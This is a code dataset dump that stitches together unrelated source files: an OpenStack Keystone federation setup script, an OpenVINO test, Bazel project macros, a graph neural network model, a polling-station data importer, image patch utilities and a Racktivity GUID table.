if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| 35.276923 | 92 | 0.63672 | #!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
if not domain_id:
raise Exception('Did not find domain "connect"')
with open('/opt/himlar/json/create-mapping.json') as fh:
data = fh.read()
data = data.replace('CONNECT_DOMAIN_ID', domain_id)
response = requests.put(baseurl + '/mappings/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/mappings/dataporten',
headers=headers, data=data)
response.raise_for_status()
with open('/opt/himlar/json/create-protocol.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten/protocols/oidc',
headers=headers, data=data)
response.raise_for_status()
data = {
'group': {
'description': 'Gruppe for test med dataporten',
'domain_id': domain_id,
'name': 'dataporten_group',
}
}
response = requests.post('http://localhost:35357/v3/groups',
headers=headers, data=json.dumps(data))
if response.status_code not in (201, 409):
raise Exception('Could not create group')
| 0 | 0 | 0 |
405a8cd18663f1cbb1ec07cd8a60a7e43de9624e | 650 | py | Python | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | monroid/openvino | 8272b3857ef5be0aaa8abbf7bd0d5d5615dc40b6 | [
"Apache-2.0"
] | 2,406 | 2020-04-22T15:47:54.000Z | 2022-03-31T10:27:37.000Z | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 4,948 | 2020-04-22T15:12:39.000Z | 2022-03-31T18:45:42.000Z | model-optimizer/unit_tests/extensions/front/tf/concat_ext_test.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 991 | 2020-04-23T18:21:09.000Z | 2022-03-31T18:40:57.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
| 29.545455 | 70 | 0.589231 | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from extensions.front.tf.concat_ext import ConcatFrontExtractor
from unit_tests.utils.extractors import PB, BaseExtractorsTestingClass
class ConcatExtractorTest(BaseExtractorsTestingClass):
def test_concat(self):
node = PB({'pb': PB({'attr': {'N': PB({'i': 4})}})})
self.expected = {
'N': 4,
'simple_concat': True,
'type': 'Concat',
'op': 'Concat',
'kind': 'op',
'axis': 1
}
ConcatFrontExtractor.extract(node)
self.res = node
self.compare()
| 349 | 33 | 49 |
de2ba11bf8bbd61c7fd9256c51e91542ed514075 | 4,034 | bzl | Python | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 12 | 2016-10-16T09:36:50.000Z | 2021-12-02T03:59:24.000Z | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 218 | 2016-12-31T23:35:51.000Z | 2022-03-30T15:55:07.000Z | tools/project/build_defs.bzl | TokTok/toktok-stack | fe60e13d42d2b45e13ea4a9448a49925bc6a6d89 | [
"CNRI-Python",
"AML",
"Xnet",
"Linux-OpenIB",
"X11"
] | 6 | 2016-09-20T12:43:36.000Z | 2021-08-06T17:39:52.000Z | """Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
| 27.256757 | 99 | 0.515865 | """Defines a project macro used in every TokTok sub-project.
It checks constraints such as the use of the correct license and the presence
and correctness of the license text.
"""
def _haskell_travis_impl(ctx):
ctx.actions.expand_template(
template = ctx.file._template,
output = ctx.outputs.source_file,
substitutions = {
"{PACKAGE}": ctx.attr.package,
},
)
outs = [ctx.outputs.source_file]
return DefaultInfo(files = depset(outs), runfiles = ctx.runfiles(files = outs))
_haskell_travis = rule(
attrs = {
"package": attr.string(mandatory = True),
"_template": attr.label(
default = Label("//tools/project:haskell_travis.yml.in"),
allow_single_file = True,
),
},
outputs = {"source_file": ".travis-expected.yml"},
implementation = _haskell_travis_impl,
)
def _haskell_project(standard_travis = True):
haskell_package = native.package_name()[3:]
cabal_file = haskell_package + ".cabal"
native.sh_test(
name = "cabal_test",
size = "small",
srcs = ["//tools/project:cabal_test.py"],
args = [
"$(location BUILD.bazel)",
"$(location %s)" % cabal_file,
],
data = [
"BUILD.bazel",
cabal_file,
],
)
if standard_travis:
_haskell_travis(
name = "travis",
package = haskell_package,
)
native.sh_test(
name = "travis_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
data = [
".travis.yml",
":travis",
],
args = [
"$(location .travis.yml)",
"$(location :travis)",
],
)
def project(license = "gpl3", standard_travis = False):
"""Adds some checks to make sure the project is uniform."""
native.sh_test(
name = "license_test",
size = "small",
srcs = ["//tools/project:diff_test.sh"],
args = [
"$(location LICENSE)",
"$(location //tools:LICENSE.%s)" % license,
],
data = [
"LICENSE",
"//tools:LICENSE.%s" % license,
],
)
native.sh_test(
name = "readme_test",
size = "small",
srcs = ["//tools/project:readme_test.sh"],
args = ["$(location README.md)"],
data = ["README.md"],
)
native.sh_test(
name = "settings_test",
size = "small",
srcs = ["//tools/project:settings_test.sh"],
args = [
"$(location .github/settings.yml)",
# qTox is an exception. Maybe we should rename the submodule?
"qTox" if native.package_name() == "qtox" else native.package_name().replace("_", "-"),
],
data = [".github/settings.yml"],
)
if (native.package_name().startswith("hs-") and
any([f for f in native.glob(["*"]) if f.endswith(".cabal")])):
_haskell_project(
standard_travis = standard_travis,
)
def workspace(projects):
native.sh_test(
name = "git_modules_test",
size = "small",
srcs = [":git_modules_test.pl"],
args = [
"$(location gitmodules)",
"$(location git-remotes)",
] + projects,
data = [
"gitmodules",
"git-remotes",
],
)
native.test_suite(
name = "license_tests",
tests = ["//%s:license_test" % p for p in projects],
)
native.test_suite(
name = "readme_tests",
tests = ["//%s:readme_test" % p for p in projects],
)
native.test_suite(
name = "settings_tests",
tests = ["//%s:settings_test" % p for p in projects],
)
native.test_suite(
name = "workspace_tests",
tests = [
":license_tests",
":readme_tests",
":settings_tests",
],
)
| 2,133 | 0 | 69 |
242e324ff0c40c3ccd9b5370c481cb686b1eb1e8 | 7,658 | py | Python | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 1 | 2020-06-16T00:03:50.000Z | 2020-06-16T00:03:50.000Z | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 2 | 2020-06-16T00:05:46.000Z | 2020-11-10T11:17:17.000Z | daydayup_submit/model.py | daydayupPro/KDDCup2020_AutoGraph | 9ce2e6ecec50c4a6f99d832cd5f8370fe985a519 | [
"MIT"
] | 4 | 2020-06-11T07:17:11.000Z | 2020-06-16T00:05:50.000Z | """the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
fix_seed(1234)
| 36.122642 | 217 | 0.57391 | """the simple baseline for autograph"""
import numpy as np
import pandas as pd
import torch
import torch.nn.functional as F
from torch.nn import Linear
from torch_geometric.nn import GCNConv, JumpingKnowledge
from torch_geometric.data import Data
from torch_geometric.nn import Node2Vec
from torch.utils.data import DataLoader
import networkx as nx
import random
from collections import Counter
from utils import normalize_features
import scipy.sparse as sp
from appnp import APPNPTrainer
from daydayup_model import GCNTrainer, TAGTrainer, XGBTrainer
from scipy import stats
from sklearn import preprocessing
import warnings
warnings.filterwarnings("ignore")
from daydayup_private_features import dayday_feature, dayday_feature_old
def fix_seed(seed):
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
fix_seed(1234)
class Model:
def __init__(self):
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def generate_pyg_data_appnp(self, data, x, edge_index):
graph = nx.from_edgelist(edge_index)
features= normalize_features(x)
num_nodes = features.shape[0]
target = np.zeros(num_nodes, dtype=np.long)
inds = data['train_label'][['node_index']].to_numpy()
train_y = data['train_label'][['label']].to_numpy()
target[inds] = train_y
train_indices = data['train_indices']
test_indices = data['test_indices']
return graph, features, target, train_indices, test_indices
def generate_pyg_data_gcn(self, data, x, edge_index):
x = torch.tensor(x, dtype=torch.float)
edge_index = torch.tensor(edge_index, dtype=torch.long).transpose(0, 1)
edge_weight = data['edge_file']['edge_weight'].to_numpy()
edge_weight = torch.tensor(edge_weight, dtype=torch.float32)
num_nodes = x.size(0)
y = torch.zeros(num_nodes, dtype=torch.long)
inds = data['train_label'][['node_index']].to_numpy()
train_y = data['train_label'][['label']].to_numpy()
y[inds] = torch.tensor(train_y, dtype=torch.long)
train_indices = data['train_indices']
test_indices = data['test_indices']
data = Data(x=x, edge_index=edge_index, y=y, edge_weight=edge_weight)
data.num_nodes = num_nodes
train_mask = torch.zeros(num_nodes, dtype=torch.bool)
train_mask[train_indices] = 1
data.train_mask = train_mask
test_mask = torch.zeros(num_nodes, dtype=torch.bool)
test_mask[test_indices] = 1
data.test_mask = test_mask
return data
def train_predict(self, data, time_budget, n_class, schema):
flag_feature = 1
sp_density = 0.0
flag_zero = 1
x = data['fea_table']
if x.shape[1] == 1:
x = x.to_numpy()
x = x.reshape(x.shape[0])
x = np.array(pd.get_dummies(x), dtype=np.float)
flag_feature = 0
else:
x.replace([np.inf, -np.inf], np.nan, inplace=True)
x.fillna(0, inplace=True)
x = x.drop('node_index', axis=1).to_numpy()
x_max = x.max()
x_min = x.min()
if x_max == x_min:
x = np.arange(x.shape[0])
x = np.array(pd.get_dummies(x), dtype=np.float)
flag_zero = 0
else:
sp_density = np.count_nonzero(x)/x.size*1.
x = x.astype(np.float)
label_counter = Counter(data['train_label']['label'])
label_most_common_1 = label_counter.most_common(1)[0][0]
label_len = len(label_counter)
df = data['edge_file']
edge_count = df.shape[0]
edge_index = df[['src_idx', 'dst_idx']].to_numpy()
edge_index = sorted(edge_index, key=lambda d: d[0])
if sp_density >= 0.1:
data = self.generate_pyg_data_gcn(data, x, edge_index)
lr_lst = [0.005, 0.005, 0.005, 0.005, 0.005]
my_epochs = 700
pred = []
if all([edge_count >= 4e5, edge_count <= 7e5]):
my_epochs = 500
elif all([edge_count > 7e5, edge_count < 15e5]):
lr_lst = [0.005, 0.005, 0.005]
my_epochs = 400
elif edge_count >= 15e5:
lr_lst = [0.005]
my_epochs = 500
for lr in lr_lst:
trainer = GCNTrainer(data, lr=lr, weight_decay=2e-4, epochs=my_epochs)
temp = trainer.train_nn()
pred.append(temp)
pred = stats.mode(pred)[0][0]
elif all([flag_feature == 0, label_len<=3]):
data = self.generate_pyg_data_gcn(data, x, edge_index)
try:
my_epochs = 500
if edge_count >= 14e5:
my_epochs = 400
trainer = TAGTrainer(data, lr=0.018, weight_decay=2e-4, epochs=my_epochs, hidden=16, dropout=0.5)
pred = trainer.train_nn()
except:
lr_lst = [0.005, 0.005, 0.005, 0.005, 0.005]
my_epochs = 700
pred = []
if all([edge_count >= 4e5, edge_count <= 7e5]):
my_epochs = 500
elif all([edge_count > 7e5, edge_count < 15e5]):
lr_lst = [0.005, 0.005, 0.005]
my_epochs = 400
elif edge_count >= 15e5:
lr_lst = [0.005]
my_epochs = 500
for lr in lr_lst:
trainer = GCNTrainer(data, lr=lr, weight_decay=2e-4, epochs=my_epochs)
temp = trainer.train_nn()
pred.append(temp)
pred = stats.mode(pred)[0][0]
elif all([flag_feature == 0, label_len>3]):
print("you are best")
train_indices=data['train_indices']
test_indices=data['test_indices']
feature_neighbor = dayday_feature_old(data)
train_y = data['train_label']['label'].to_numpy()
train_x = feature_neighbor[train_indices]
test_x = feature_neighbor[test_indices]
trainer = XGBTrainer(train_x, train_y, test_x, n_class, max_depth=6, subsample=0.7, colsample_bytree=0.7, random_state=0, n_jobs=3)
pred = trainer.train_nn()
elif flag_zero == 0:
train_indices=data['train_indices']
test_indices=data['test_indices']
feature_neighbor = dayday_feature(data, n_class=n_class, label_most_common_1=label_most_common_1)
train_y = data['train_label']['label'].to_numpy()
train_x = feature_neighbor[train_indices]
test_x = feature_neighbor[test_indices]
trainer = XGBTrainer(train_x, train_y, test_x, n_class, n_jobs=3)
pred = trainer.train_nn()
else:
graph, features, target, train_mask, test_mask = self.generate_pyg_data_appnp(data, x, edge_index)
trainer = APPNPTrainer(graph, features, target, train_mask, test_mask, sp_density, learning_rate=0.012, lambd=2.5e-3, epochs=600, model_name="exact", iterations=5, alpha=0.31, layers=[64,64], dropout=0.6)
pred = trainer.train_neural_network()
return pred
| 6,701 | -9 | 166 |
545bdc14f39b8de2b64e34671f1d58d8fef59fff | 5,175 | py | Python | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | 364 | 2020-10-19T07:16:41.000Z | 2022-03-31T06:10:55.000Z | polling_stations/apps/data_importers/management/commands/import_bolton.py | zuzak/UK-Polling-Stations | bddfd52ad5da09d6310c8e72c9646bed2add2578 | [
"BSD-3-Clause"
] | null | null | null | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
| 55.053191 | 119 | 0.622802 | from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E08000001"
addresses_name = (
"parl.2019-12-12/Version 1/Democracy_Club__12December2019Bolton.CSV"
)
stations_name = "parl.2019-12-12/Version 1/Democracy_Club__12December2019Bolton.CSV"
elections = ["parl.2019-12-12"]
allow_station_point_from_postcode = False
def station_record_to_dict(self, record):
if record.polling_place_id == "3670":
# Trinity Methodist Hall (postcode geocode puts this quite away from actual location, making error spotting
# more difficult)
record = record._replace(
polling_place_easting=374156, polling_place_northing=405696
)
return super().station_record_to_dict(record)
def address_record_to_dict(self, record):
if record.property_urn == "10001244221":
record = record._replace(property_urn="", post_code="BL1 4JU")
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if record.addressline6.strip() == "BL7 OHR":
rec["postcode"] = "BL7 0HR"
if record.addressline6.strip() == "BL4 ONX":
rec["postcode"] = "BL4 0NX"
if record.addressline6.strip() == "BL4 ONY":
rec["postcode"] = "BL4 0NY"
if uprn == "100010854762":
rec["postcode"] = "BL3 4BG"
if uprn in ["100010864955", "100010864956"]:
rec["postcode"] = "BL5 3QW"
if record.addressline6.strip() in ("BL4 9AJ",):
return None
if record.addressline1.endswith(" The Hollins Halls of Residence"):
# Postcode wrong in AddressBase, according to the web
rec["accept_suggestion"] = False
if uprn in [
"100010900195", # BL24JU -> BL23JL : 32 Longsight Lane, Harwood, Bolton, Lancs
"100010900196", # BL24JU -> BL23JR : The Bungalow, 33 Longsight Lane, Harwood, Bolton, Lancs
"100010900240", # BL24JU -> BL24BA : 215 Longsight Lane, Harwood, Bolton, Lancs
"100012432800", # BL24JU -> BL24LB : Hawthorne Cottage, Longsight Lane, Harwood, Bolton, Lancs
"100012432803", # BL24JU -> BL24JX : Longworth Manor, Longsight Lane, Harwood, Bolton, Lancs
"200002549966", # BL23BQ -> BL24BQ : 105 Lea Gate, Bradshaw, Bolton, Lancs
"200002549967", # BL23BQ -> BL24BQ : 107 Lea Gate, Bradshaw, Bolton, Lancs
"100010930105", # BL24JA -> BL24HR : 85 Stitch-Mi-Lane, Harwood, Bolton, Lancs
"100010930106", # BL24JA -> BL24HR : 87 Stitch-Mi-Lane, Harwood, Bolton, Lancs
"100010922768", # BL52DL -> BL51DL : 101 Rutherford Drive, Over Hulton, Bolton, Lancs
"100012555302", # BL66PX -> BL17PX : Bob Smithy, 1450 & 1448 Chorley Old Road, Bolton, Lancs
"100010897318", # BL52JX -> BL52JZ : Ground Floor Flat, 300 Leigh Road, Westhoughton, Bolton, Lancs
]:
rec["accept_suggestion"] = True
if uprn in [
"10013876189", # BL17LA -> BL53DR : 1A Park Terrace, Bolton, Lancs
"100010922976", # BL49HG -> BL15LJ : 19 Norris Street, Farnworth, Bolton, Lancs
"100010922977", # BL49HG -> BL15LJ : 21 Norris Street, Farnworth, Bolton, Lancs
"100010922978", # BL49HG -> BL15LJ : 23 Norris Street, Farnworth, Bolton, Lancs
"10070921264", # BL79GX -> BL65LJ : 54 Clarendon Gardens, Bromley Cross, Bolton, Lancs
"10070920393", # BL79SZ -> BL25DR : 9 Bedford Street, Egerton, Bolton, Lancs
"10070923602", # BL22LA -> BL26BB : 398 Tonge Moor Road, Bolton, Lancs
"10070919948", # BL35QU -> BL24LL : First Floor, 333 Wigan Road, Bolton, Lancs
"100010865555", # BL15GJ -> BL34HY : 28 Clevelands Drive, Bolton, Lancs
"100010871529", # BL14SE -> BL35HH : 249 Spa Road, Bolton, Lancs
"100010868073", # BL47QX -> BL32LZ : 27 Darley Street, Farnworth, Bolton, Lancs
"100010873637", # BL13QW -> BL18DS : 35 Draycott Street, Bolton, Lancs
"10070920228", # BL47AT -> BL49PF : Flat 10 Alan Ball House, 89 Bolton Road, Farnworth, Bolton, Lancs
"100012558352", # BL33LB -> BL33JU : First Floor Flat, 187 Morris Green Lane, Bolton, Lancs
"100012558463", # BL33LB -> BL33JU : Ground Floor Flat, 187 Morris Green Lane, Bolton, Lancs
"100012431165", # BL47SL -> BL47SF : Cemetery Lodge, Cemetery Road, Kearsley, Bolton, Lancs
"100010863119", # BL15DP -> BL66JT : Flat Above, 543 Chorley New Road, Bolton, Lancs
"100010942100", # BL34QH -> BL52BS : 446 Wigan Road, Bolton, Lancs
"100010871458", # BL35HJ -> BL34EU : Flat 1, 352 Deane Road, Bolton, Lancs
"10001246600", # BL15PS -> BL15NH : 2 Markland Hill Lane, Bolton, Lancs
"100010901886", # BL32LS -> BL23JZ : Hardman Fold Lodge, 3 Lynwood Avenue, Bolton, Lancs
]:
rec["accept_suggestion"] = False
return rec
| 4,680 | 389 | 23 |
58c5d7e9701ddb6a19212520e727f15050de1fcc | 4,412 | py | Python | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 26 | 2020-04-10T13:25:12.000Z | 2022-03-20T12:27:02.000Z | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 10 | 2020-04-05T10:42:47.000Z | 2022-03-12T00:12:23.000Z | E2E/utility/utility_np.py | FrancescoMarra/E2E-ForgeryDetection | 352a788cdbe00184a6a29158c5c315a9832b326e | [
"BSD-4-Clause-UC"
] | 5 | 2020-04-05T10:44:36.000Z | 2022-03-29T06:41:03.000Z | # -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
| 36.46281 | 212 | 0.546464 | # -*- coding: utf-8 -*-
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#
# Copyright (c) 2019 Image Processing Research Group of University Federico II of Naples ('GRIP-UNINA').
# All rights reserved.
# This work should only be used for nonprofit purposes.
#
# By downloading and/or using any of these files, you implicitly agree to all the
# terms of the license, as specified in the document LICENSE.md
# (included in this package) and online at
# http://www.grip.unina.it/download/LICENSE_OPEN.txt
#
import numpy as np
from skimage.util import view_as_blocks,view_as_windows
from math import floor
from scipy.interpolate import interp2d
from scipy.io import savemat
################################################
import matplotlib.pyplot as plt
def np_im2patch(im, pShape,pStride=None):
if np.isscalar(pShape):
pShape = (pShape, pShape)
if pStride is None:
pStride = (pShape, pShape)
if np.isscalar(pStride):
pStride = (pStride, pStride)
imShape = im.shape
if im.ndim == 3:
if imShape[2] == 1:
im = im.squeeze()
elif len(pShape) == 2:
pShape = (pShape[0], pShape[1], imShape[2])
pStride = (pStride[0], pStride[1], imShape[2])
pad = np.array( np.add( np.multiply ( np.ceil( np.divide( np.subtract( imShape, np.subtract(pShape, pStride) ) , pStride, dtype=np.float) ),pStride), np.subtract(pShape, pStride)) - imShape,dtype=np.int)
pad = pad[0:2]
assert((pad >= 0).all())
if pad.sum() == 0:
p = view_as_windows(im, pShape,pStride)
if im.ndim == 3 and p.shape[2] == 1:
p = np.squeeze(p, axis=2)
return p
if im.ndim == 2:
im_post = np.pad(im, ((0, pad[0]), (0, pad[1])), 'constant')
im_pre = np.pad(im, ((pad[0], 0), (pad[1], 0)), 'constant')
im_pre_c = np.pad(im, ((pad[0], 0), (0, pad[1])), 'constant')
im_pre_r = np.pad(im, ((0, pad[0]), (pad[1], 0)), 'constant')
elif im.ndim == 3:
im_post = np.pad(im, ((0, pad[0]), (0, pad[1]), (0,0)), 'constant')
im_pre = np.pad(im, ((pad[0], 0), (pad[1], 0), (0,0)), 'constant')
im_pre_c = np.pad(im, ((pad[0], 0), (0, pad[1]), (0,0)), 'constant')
im_pre_r = np.pad(im, ((0, pad[0]), (pad[1], 0), (0,0)), 'constant')
else:
raise NotImplementedError('2D or 3D input images are accepted.')
p = view_as_windows(im_post, pShape,pStride).copy()
if im.ndim == 3 and p.shape[2] == 1:
p = np.squeeze(p, axis=2)
for i in range(p.shape[0]-1):
p[i, -1] = im[i * pStride[0]:i * pStride[0] + pShape[0],-pShape[1]:, :]
for j in range(p.shape[1]-1):
p[-1, j] = im[-pShape[0]:,j * pStride[1]:j * pStride[1] + pShape[1], :]
p[-1, -1] = im[-pShape[0]:,-pShape[1]:, :]
return p
def np_patch2im(p, imShape,pStride=None,aggregation_mean=True):
pShape = p.shape[2:]
if pStride is None:
pStride = pShape
if np.isscalar(pStride):
pStride = (pStride, pStride,imShape[2])
img = np.zeros(imShape)
#obj = plotimg(img)
for i in range(0,p.shape[0]-1):
for j in range(0,p.shape[1]-1):
#print(i,j,i * pStride, i * pStride + pShape[0],(j * pStride),(j * pStride + pShape[1]))
img[(i * pStride[0]):(i * pStride[0] + pShape[0]), (j * pStride[1]):(j * pStride[1] + pShape[1]), :] += p[i,j]
#plotimg(img,obj)
for i in range(p.shape[0]-1):
img[i * pStride[0]:i * pStride[0] + pShape[0],-pShape[1]:, :] += p[i, -1]
#plotimg(img, obj)
for j in range(p.shape[1]-1):
img[-pShape[0]:,j * pStride[1]:j * pStride[1] + pShape[1], :] += p[-1, j]
#plotimg(img, obj)
img[-pShape[0]:,-pShape[1]:, :] += p[-1, -1]
if pStride != pShape and aggregation_mean:
p_1 = np_im2patch(np.ones(imShape), pShape, pStride)
div,_ = np_patch2im(p_1, imShape, pStride,False)
#plotimg(div / np.max(div))
# div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
# div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
#div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
img /= div
return img,div
return img,None
| 3,550 | 0 | 50 |
685146d94e80465728e0ac16651b1e598592e6af | 46,188 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 1 | 2020-10-05T08:53:57.000Z | 2020-10-05T08:53:57.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 17 | 2019-11-14T08:41:37.000Z | 2020-05-27T09:23:51.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | null | null | null | # pylint: disable=W0201
from Jumpscale import j
JSBASE = j.baseclasses.object
# Variables
functions = {}
func = Functions()
functions[1] = func
func.guid = 1
func.name = "GeneralModuleStatus"
func.description = "General status of a module"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[2] = func
func.guid = 2
func.name = "SpecificModuleStatus"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[3] = func
func.guid = 3
func.name = "CurrentTime"
func.description = "Unix timestamp of the current time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_TIMESTAMP"
func.valDef.size = 4
func.valDef.unit = "UNIX"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[4] = func
func.guid = 4
func.name = "Voltage"
func.description = "True RMS Voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5] = func
func.guid = 5
func.name = "Frequency"
func.description = "Frequency"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "Hz"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[6] = func
func.guid = 6
func.name = "Current"
